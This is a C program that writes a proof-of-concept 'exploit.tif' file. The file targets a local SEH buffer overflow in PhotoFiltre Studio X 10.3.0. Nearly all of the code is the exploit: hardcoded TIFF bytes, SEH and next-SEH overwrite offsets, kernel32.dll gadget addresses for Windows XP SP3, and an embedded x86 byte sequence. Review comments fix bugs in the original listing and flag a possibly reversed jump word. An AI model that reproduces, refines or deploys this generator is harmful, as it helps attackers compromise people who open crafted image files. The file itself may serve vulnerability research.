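/*
 * PhotoFiltre Studio X 10.3.0 -- .tif local buffer overflow proof-of-concept
 * file generator (original author: fl0 fl0w).
 *
 * Writes "exploit.tif" = tif1 (257 bytes) + 940 filler bytes + tif2 (163 bytes).
 * Three 32-bit values are patched into tif1 before it is written (see
 * filebuild): a pop/pop/ret gadget into the SEH handler slot (offset 217), a
 * jmp ebp into the next-SEH slot (offset 213) and a "jump over" word at offset
 * 29.  The gadget addresses come from kernel32.dll on Windows XP Pro SP3 as
 * noted by the author; they are build-specific and will not transfer to any
 * other Windows version or to a system with ASLR.
 *
 * Review notes versus the original listing:
 *  - free() was called on a stack array (undefined behaviour); removed.
 *  - gen_random() started at index 1, so byte 0 of the filler was an
 *    uninitialized stack byte that leaked into the output file.
 *  - an "exploit.in" stream was opened but never used or closed, and the
 *    instr record was heap-allocated (sizeof(instr)*sizeof(instr) bytes) and
 *    never freed; both replaced by stack objects.
 *  - the patched addresses were memcpy'd as host integers; they are now
 *    serialized little-endian explicitly so the output does not depend on
 *    the host's byte order.
 *  - mcpy() ignored its length argument (it used sizeof of a pointer).
 *  - fwrite/fclose results are now checked and "file done" is only printed
 *    when the file was actually written.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define fisier FILE
#define ALOC(tip, n) (tip *)malloc(sizeof(tip) * (n))
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"

typedef char i8;
typedef short i16;
typedef int i32;
typedef unsigned char u8;
typedef unsigned int u32;

/* Layout constants of the generated file (same values as the original
 * sizes[] table: tif1sz, tif2sz, sehoffset, nsehoffset, junksz, jmpoffset). */
enum {
    TIF1_SZ  = 257,  /* bytes in tif1[]: TIFF header + IFD + payload region */
    TIF2_SZ  = 163,  /* bytes in tif2[]: trailing data */
    SEH_OFF  = 217,  /* offset in tif1 that lands on the SEH handler slot */
    NSEH_OFF = 213,  /* offset in tif1 that lands on the next-SEH slot */
    JUNK_SZ  = 940,  /* filler bytes written between tif1 and tif2 */
    JMP_OFF  = 29    /* offset in tif1 where the jmpbyte word is written */
};

/* Kept for compatibility with the original listing (1-based v[1]..v[6]). */
i32 sizes[] = { TIF1_SZ, TIF2_SZ, SEH_OFF, NSEH_OFF, JUNK_SZ, JMP_OFF };

/* Return addresses taken from kernel32.dll on MS Windows XP Pro SP3. */
typedef struct {
    u32 popopret; /* pop esi / pop edi / ret gadget -> SEH handler slot */
    u32 jmpbyte;  /* word written at JMP_OFF ("jmp over" per the author) */
    u32 jmpEBP;   /* jmp ebp gadget -> next-SEH slot */
} instr;

void gen_random(i8 *s, const int len);
void print(i8 *msg);
i32 mcpy(void *dest, const void *source, i32 len);
void fwi32(fisier *F, i32 adr);
i32 filerr(fisier *F);
void error(void);
i32 filebuild(void);
void readf(void);
/* Declared by the original listing but never defined or called here. */
unsigned int getFsize(fisier *F, i8 *name);

/*
 * Store a 32-bit value little-endian (x86 order) at dst[0..3].
 * The original memcpy'd a host int, which only matches on little-endian hosts.
 */
static void put_le32(u8 *dst, u32 v)
{
    dst[0] = (u8)(v & 0xffU);
    dst[1] = (u8)((v >> 8) & 0xffU);
    dst[2] = (u8)((v >> 16) & 0xffU);
    dst[3] = (u8)((v >> 24) & 0xffU);
}

/*
 * Entry point: build exploit.tif, print the banner, wait for a key press.
 * Returns 0 when the file was written, 1 otherwise.
 */
i32 main(void)
{
    i32 rc = filebuild();

    printf("%s\n%s\n", POCNAME, AUTHOR);
    if (rc == 0) {
        print("file done");
    }
    getchar();
    return rc == 0 ? 0 : 1;
}

/*
 * Build "exploit.tif" in the current directory.
 *
 * Strategy as described by the author: overwrite the SEH handler with a
 * pop/pop/ret, overwrite next-SEH with a jmp ebp, and place a short jump at
 * the location ebp points to.  There is no room in the file for shellcode
 * (or for an egghunter), hence the jmp ebp approach.
 *
 * Returns 0 on success, -1 if the file could not be opened or fully written
 * (error() has already reported the cause via perror in that case).
 */
i32 filebuild(void)
{
    /* Little-endian TIFF.  The IFD count field claims 0x17 entries but only
     * 17 structured 12-byte entries follow; the remaining bytes are the raw
     * region into which the SEH overwrite values are patched below. */
    u8 tif1[] = {
        /* header: "II", 42, first IFD at offset 8 */
        0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00,
        /* IFD entry count */
        0x17, 0x00,
        /* IFD entries: tag, type, count, value/offset */
        0xFE, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
        0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01, 0x00, 0x00,
        0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00,
        0x02, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
        0x03, 0x01, 0x03, 0x00, 0x83, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
        0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
        0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x11, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00,
        0x12, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
        0x17, 0x01, 0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00,
        0x1A, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xDA, 0x02, 0x00, 0x00,
        0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02, 0x00, 0x00,
        0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x28, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
        0x29, 0x01, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x43,
        /* raw payload region; bytes 213..220 are replaced by put_le32 below */
        0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89, 0xE5, 0x83,
        0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24,
        0x04, 0xD0, 0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00,
        0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9, 0xC3,
    };
    /* Trailing bytes written after the filler; copied verbatim from the
     * original PoC. */
    u8 tif2[] = {
        0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,
        0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,
        0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
        0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,
        0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,
        0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,
        0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,
        0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,
        0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,
        0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,
        0xC4, 0x00, 0x33,
    };
    i8 junk[JUNK_SZ + 1]; /* +1: gen_random NUL-terminates at [len] */
    instr ASM;
    fisier *out;
    size_t written;

    /* The patch offsets below index into tif1; make sure the tables have not
     * drifted from the layout constants. */
    _Static_assert(sizeof tif1 == TIF1_SZ, "tif1 size changed");
    _Static_assert(sizeof tif2 == TIF2_SZ, "tif2 size changed");
    _Static_assert(SEH_OFF + 4 <= TIF1_SZ && NSEH_OFF + 4 <= TIF1_SZ && JMP_OFF + 4 <= TIF1_SZ,
                   "patch offset outside tif1");

    ASM.popopret = 0x7C86CFC2U; /* pop esi / pop edi / ret, kernel32.dll XP SP3 */
    ASM.jmpEBP   = 0x7C81ACD3U; /* jmp ebp, kernel32.dll XP SP3 */
    /* NOTE(review): stored little-endian, so the file bytes at 29..32 become
     * 00 03 40 EB.  If a short "jmp +0x40" (EB 40) was intended the byte
     * order of this constant looks reversed; the author's own comment says
     * the instruction still needs work ("u need to cause a exception NOT a
     * exit call") -- confirm in a debugger before relying on it. */
    ASM.jmpbyte  = 0xEB400300U;

    put_le32(tif1 + SEH_OFF, ASM.popopret);
    put_le32(tif1 + NSEH_OFF, ASM.jmpEBP);
    put_le32(tif1 + JMP_OFF, ASM.jmpbyte);

    out = fopen("exploit.tif", "wb");
    if (out == NULL) {
        error();
        return -1;
    }

    /* Filler is alphanumeric so the region is easy to spot in a debugger. */
    gen_random(junk, JUNK_SZ);

    written  = fwrite(tif1, 1, sizeof tif1, out);
    written += fwrite(junk, 1, JUNK_SZ, out);
    written += fwrite(tif2, 1, sizeof tif2, out);

    /* fclose flushes; a failed flush is a failed write. */
    if (fclose(out) != 0 || written != sizeof tif1 + JUNK_SZ + sizeof tif2) {
        error();
        return -1;
    }
    return 0;
}

/* Report the last library error on stderr. */
void error(void)
{
    perror("\nError:");
}

/*
 * Error indicator of stream F; a NULL stream is reported as an error
 * instead of being dereferenced.
 */
i32 filerr(fisier *F)
{
    return F ? ferror(F) : 1;
}

/* Placeholder kept from the original listing; does nothing. */
void readf(void)
{
}

/*
 * Write the 32-bit value adr to F as four little-endian bytes.
 * The shift is done on the unsigned image of adr so negative values are
 * well-defined.
 */
void fwi32(fisier *F, i32 adr)
{
    u32 v = (u32)adr;

    fputc((int)(v & 0xffU), F);
    fputc((int)((v >> 8) & 0xffU), F);
    fputc((int)((v >> 16) & 0xffU), F);
    fputc((int)((v >> 24) & 0xffU), F);
}

/*
 * Copy len bytes from source to dest (regions must not overlap).
 * Returns the number of bytes copied; a negative len copies nothing and
 * returns 0.  (The original used sizeof(source) -- the size of a pointer --
 * and ignored len.)
 */
i32 mcpy(void *dest, const void *source, i32 len)
{
    if (len <= 0 || dest == NULL || source == NULL) {
        return 0;
    }
    memcpy(dest, source, (size_t)len);
    return len;
}

/* Print msg on stdout with the "[*]" prefix used by the banner. */
void print(i8 *msg)
{
    printf("[*]%s\n", msg);
}

/*
 * Fill s[0..len-1] with characters from [0-9A-Za-z] and NUL-terminate at
 * s[len]; the caller must provide at least len + 1 bytes.  rand() is not
 * seeded, so the sequence is the same on every run -- fine for filler, not
 * for anything that needs unpredictability.  A negative len is ignored.
 */
void gen_random(i8 *s, const int len)
{
    static const i8 alphanum[] =
        "0123456789ABCDEFGHIJKLMNOPQRST"
        "UVWXYZabcdefghijklmnopqrstuvwxyz";
    const int nsym = (int)(sizeof alphanum - 1); /* exclude the NUL */
    i32 i;

    if (s == NULL || len < 0) {
        return;
    }
    for (i = 0; i < len; ++i) {
        s[i] = alphanum[rand() % nsym];
    }
    s[len] = 0;
}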